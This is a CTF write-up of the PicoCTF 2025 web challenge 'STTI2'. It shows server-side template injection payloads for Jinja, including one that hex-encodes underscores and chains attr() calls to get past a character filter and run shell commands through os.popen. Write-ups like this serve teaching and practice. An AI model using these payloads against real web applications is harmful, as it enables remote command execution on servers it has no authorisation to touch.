Contents

🌐 STTI2

A detailed write-up of the Web challenge 'STTI2' from PicoCTF - 2025

/images/PicoCTF-2025/Web/STTI2/challenge_presentation.png
Challenge Presentation

📊 Challenge Overview

Category Details Additional Info
🏆 Event PicoCTF - 2025 Event Link
🔰 Category Web 🌐
💎 Points 200 Out of 500 total
⭐ Difficulty 🟡 Medium Personal Rating: 1/10
👤 Author Venax Profile
🎮 Solves (At the time of flag submission) 542 solve rate
📅 Date 10-03-2025 PicoCTF - 2025
🦾 Solved By mH4ck3r0n3 Team:

📝 Challenge Information

I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :) I heard templating is a cool and modular way to build web apps! Check out my website here!

🎯 Challenge Files & Infrastructure

Provided Files

1
Files: None

🔍 Initial Analysis

First Steps

Initially, the website appears as follows:

/images/PicoCTF-2025/Web/STTI2/site_presentation.png
Site Presentation

This is version two of the challenge STTI1. Sending the same payload as in the previous challenge, {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}, I get:

/images/PicoCTF-2025/Web/STTI2/filter.png
Filter

So it looks like a filter has been added… Let’s move on to the exploitation phase.

🔬 Vulnerability Analysis

Potential Vulnerabilities

  • SSTI (Server Side Template Injection)

🎯 Solution Path

Exploitation Steps

Exploitation

Usually, to bypass filters, characters like _ are encoded in hex, and attr| is used instead of . to build the object chain since some filters might block _ and .. So, I found a payload on HackTricks that already encodes these characters:

"{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}"

I executed cat flag directly, given the previous challenge. By printing the contents of the flag file, I successfully retrieved the flag.

Flag capture

/images/PicoCTF-2025/Web/STTI2/manual_flag.png
Manual Flag

🛠️ Exploitation Process

Approach

The automatic exploit is identical to the one from the previous challenge. It sends the SSTI payload with a POST request and then extracts the flag from the response using a regex.

🚩 Flag Capture

Flag

Proof of Execution

/images/PicoCTF-2025/Web/STTI2/automated_flag.png
Automated Flag
Screenshot of successful exploitation

🔧 Tools Used

Tool Purpose
Python Exploit

💡 Key Learnings

Skills Improved

  • Binary Exploitation
  • Reverse Engineering
  • Web Exploitation
  • Cryptography
  • Forensics
  • OSINT
  • Miscellaneous

📚 References & Resources

Learning Resources


📊 Final Statistics

Metric Value Notes
Time to Solve 00:02 From start to flag
Global Ranking (At the time of flag submission) 2122/8400 Challenge ranking
Points Earned 200 Team contribution

Created: 10-03-2025 • Last Modified: 10-03-2025 *Author: mH4ck3r0n3 • Team: *